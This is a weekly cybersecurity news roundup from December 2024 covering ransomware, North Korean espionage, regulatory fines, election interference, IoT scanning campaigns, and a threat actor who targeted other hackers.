SAN MATEO, CA, December 23, 2024 — Cybersecurity news weekly roundup. Stories, news, politics, and events that impacted the network security industry last week. Sponsored by NetworkTigers.
New LockBit ransomware coming in 2025
The February 2024 takedown of LockBit may have put the group’s name out of the spotlight for a while, but the ransomware gang’s admin, LockBitSupp, is teasing a potential comeback in 2025 in the form of LockBit 4.0. Hyped up with a message promising to send pen testers on a “billionaire journey” and the mention of five TOR sites and a new website, LockBit 4.0 is said to be released on February 3, 2025. A spokesperson for the training platform Cyber Threat Intelligence Academy said via social media: “[With] these five different onion links, it seems that LockBit is strengthening its infrastructure to take its operations one step further.†LockBitSupp is not a stranger to fictitious claims. The release of LockBit Green as a new version of the ransomware was denied by researchers, who instead found it to be a rebranded version of a Conti encryptor. Time will tell if LockBit 4.0 puts the group back on the radar or ends up being its last breath. Read more.
Lazarus Group targets nuclear engineers
A long-running North Korean espionage campaign called Operation Dream Job has been observed targeting at least two employees working at an unnamed nuclear-related organization. According to Kaspersky, the attacks saw Lazarus Group threat actors deploy a new modular backdoor called CookiePlus. Kasperksy, which has been tracking the campaign as NukeSpeed, said that one of the two most common methods used by the group to trick victims is to distribute trojanized remote access tools disguised as “skills assessments,” which is the pattern they followed persistently in this case. “Lazarus delivered the first archive file to at least two people within the same organization (we’ll call them Host A and Host B),” Kaspersky researchers Vasily Berdnikov and Sojun Ryu said. “After a month, they attempted more intensive attacks against the first target.” In the firm’s report on Lazarus activity, Kaspersky says that “new modular malware, such as CookiePlus, suggests that the group is constantly working to improve their arsenal and infection chains to evade detection by security products.” Read more.
CISA staffers worried about persecution
CISA staffers are expressing anxiety in the lead-up to Donald Trump’s return to the White House, fearing that promised cuts to government spending and an ax to grind with the agency whose former director refuted his claims of 2020 election fraud will see the organization gutted. “We believe it’s our responsibility to help those who don’t really have the ability to help themselves,†says one CISA employee. “We take our missions seriously, which is why we are all concerned, to a T, about if any decisions are going to affect our mission negatively.†Workers fear that Trump and his team’s distaste for corporate oversight could cause compliance efforts such as secure-by-design policies and other corporate responsibility initiatives to be left toothless. The sense of impending politicization has prompted many CISA staffers to prepare for the worst, with some worried that a weakening of the agency will cause “big, well-respected individuals in the security community” to take their expertise elsewhere. Read more.
Meta fined $264 million for 2018 data breach
An investigation into a 2018 data breach on Facebook has resulted in parent company Meta being hit with a $264 million fine courtesy of Ireland’s Data Protection Commission. Due to the company’s Dublin-based headquarters, the Commission, which is Meta’s lead regional privacy regulator, found multiple infringements of General Data Protection Regulations that allowed hackers to access user accounts. Meta will appeal the decision, saying it “relates to an incident from 2018. We took immediate action to fix the problem as soon as it was identified.” The company said it “proactively informed people impacted,” the Irish watchdog, regulators, and the FBI. The hack exploited three bugs in Facebook’s “View As” feature and allowed attackers to take control of compromised user accounts. Read more.
TikTok election integrity investigation launched
A recent presidential election in Romania had its second round of voting canceled in response to a surprise surge in support for independent Calin Georgescu, a controversial far-right candidate whose views have been described as pro-Putin. A declassified intelligence report by the European Commission states that tens of thousands of TikTok accounts were suddenly activated weeks before the first round of voting. “Following serious indications that foreign actors interfered in the Romanian presidential elections using TikTok, we are now thoroughly investigating whether TikTok has violated the Digital Services Act by failing to tackle such risks. It should be crystal clear that in the EU, all online platforms, including TikTok, must be held accountable.†Some TikTok posts promoting Georgescu were seemingly not marked as “election content,” which is against local laws. Read more.
INTERPOL pushes to change pig butchering term
The term “pig butchering” is decidedly insulting to victims of said scams, and INTERPOL is hoping to change the linguistics to encourage more people to come forward after being ripped off. “The term ‘pig butchering’ dehumanizes and shames victims of such frauds, deterring people from coming forward to seek help and provide information to the authorities,” the agency said. INTERPOL is advocating for “romance baiting” as a replacement term for the fraud. The effort is not without support, with Google referring to the scams as “international online consumer investment fraud schemes.” “Words matter. We’ve seen this in the areas of violent sexual offenses, domestic abuse, and online child exploitation. We need to recognize that our words also matter to the victims of fraud,” INTERPOL Acting Executive Director of Police Services Cyril Gout said. “It’s time to change our language to prioritize respect and empathy for the victims and to hold fraudsters accountable for their crimes.” Read more.
Web cameras and DVRs under attack
The FBI has warned that HiatusRAT malware attackers “conducted a scanning campaign targeting Internet of Things (IoT) devices in the US, Australia, Canada, New Zealand, and the United Kingdom… The actors scanned web cameras and DVRs for vulnerabilities including CVE-2017-7921, CVE-2018-9995, CVE-2020-25078, CVE-2021-33044, CVE-2021-36260, and weak vendor-supplied passwords.” The FBI has advised those with vulnerable devices to limit their use and isolate them from the rest of their network infrastructure to prevent further intrusions in case of a successful breach. HiatusRAT malware is primarily used to “deploy additional payloads on infected devices, converting the compromised systems into SOCKS5 proxies for command-and-control server communication.” The RAT’s pivot to targeting preference and information gathering appears to align with strategies employed by Chinese threat actors. Read more.
National Cyber Incident Response plan available for comment
CISA has pitched an update to the National Cyber Incident Response plan after years of “broad and extensive engagement†with regulators, public- and private-sector partners, and a number of agencies. The objective of the refresh is to create a more “agile, actionable, updated framework that will provide coherent coordination that matches the pace of our adversaries and the predictable method for how to engage with us,†according to Jeff Greene, CISA’s executive assistant director for cybersecurity. Greene also said that over 150 cyber experts from 66 organizations were tapped to help form the draft document in addition to three public listening sessions. A month-long public comment period for the draft has just begun and is set to end on January 15. Greene said that allowing the private sector to have input about the drafting of the plan was “essential from day one” and will be “essential going forward.” Read more.
Insurance claim-handling AI chatbot accessible on the internet
UnitedHealthcare’s Optum has been found to have left an AI-powered chatbot designed to assist employees in handling customer health insurance claims and disputes exposed to the internet and accessible by web browsers. The chatbot, dubbed “SOP Chatbot,” did not seem to allow outsiders to access personal or protected healthcare information and has been restricted by Optum since its exposure was made known. Optum spokesperson Andrew Krejci said the chatbot “was a demo tool developed as a potential proof of concept†but was “never put into production, and the site is no longer accessible.†The news comes as UnitedHealthcare is under significant public scrutiny for its claim denials, multibillion-dollar profits, and the alleged use of an AI algorithm to find reasons to deny claims for medical care more efficiently. Read more.
390,000 WordPress accounts stolen from hackers
A threat actor tracked as MUT-1244 has engaged in a year-long campaign that targeted other hackers and stole 390,000 credentials using a trojanized WordPress credentials checker, according to findings from Datadog Security Labs. The firm reports that SSH private keys and AWS access keys were also taken from other victims, including red teamers, penetration testers, and security researchers. To infect their victims, MUT-1244 used the “same second-stage payload pushed via dozens of trojanized GitHub repositories delivering malicious proof-of-concept (PoC) exploits that targeted known security flaws, along with a phishing campaign prompting targets to install a fake kernel upgrade camouflaged as a CPU microcode update.” Datadog Security Labs believes that hundreds of systems are still compromised, with more to come, as the campaign appears to be ongoing. Read more.
More cybersecurity news
- Last week’s news
- More cybersecurity news
- All articles sponsored by NetworkTigers
